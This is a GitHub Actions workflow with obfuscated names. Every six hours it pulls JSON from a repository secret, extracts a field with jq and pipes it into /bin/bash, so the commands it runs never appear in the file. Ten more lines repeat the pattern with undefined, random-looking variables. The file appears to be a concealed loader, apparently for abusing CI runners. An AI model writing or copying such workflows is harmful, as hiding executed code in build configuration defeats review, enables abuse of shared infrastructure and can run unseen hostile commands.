name: lijun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '58 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lijun19871010
        env:
          jxa25: ${{ secrets.jxa25 }}
        run: |
          echo $jxa25 | jq -r .u055 | /bin/bash
          echo $c8472 | jq -r .zrx8 | /bin/bash
          echo $tdg05379 | jq -r .nk246 | /bin/bash
          echo $fxdjw8 | jq -r .xf6 | /bin/bash
          echo $qbibg28 | jq -r .ns93352 | /bin/bash
          echo $bkf524 | jq -r .ztfvy024 | /bin/bash
          echo $udf868 | jq -r .jkfnu426 | /bin/bash
          echo $d7573 | jq -r .i9 | /bin/bash
          echo $ixyjt797 | jq -r .a88 | /bin/bash
          echo $f5147 | jq -r .ei342 | /bin/bash
          echo $xq35 | jq -r .eq739 | /bin/bash

